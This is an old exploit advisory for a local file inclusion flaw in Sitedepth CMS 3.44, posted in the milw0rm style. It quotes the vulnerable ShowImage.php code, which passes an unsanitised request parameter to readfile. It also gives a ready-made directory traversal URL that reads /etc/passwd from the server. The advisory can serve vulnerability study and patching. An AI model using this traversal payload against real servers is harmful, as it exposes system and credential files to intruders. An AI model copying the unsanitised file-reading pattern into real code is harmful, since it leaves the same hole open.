[*] Sitedepth CMS 3.44 Local File Include LFI Exploit
[!] Application homepage : http://www.sitedepth.com/
[!] Author : H4 / Team XPK
[!] Contact : H4_XPK@hotmail.com
[!] Bug discovered : 2006-11-07
[!] Bug published : 2007-06-25
Vuln. code: ShowImage.php
include 'sitedepth.php';
$content_type = 'image/jpeg';
$filename = SD_DIRS_REPOS . '/html/' . $_GET['name'];
$filename_show = $_GET['name'];
header ('Content-type: ' . $content_type);
header ('Content-Disposition: inline; filename=' . $filename_show);
readfile ($filename); <-------------- BAD!
[!] Exploitation : http://noobie.com/sitedepth/ShowImage.php?name=../../../../../../../../etc/passwd
[!] Sometimes it`s time to give instead of taking :)
[!] Greetz to Angeldust & Streets and to rest of community.
# milw0rm.com [2007-06-25]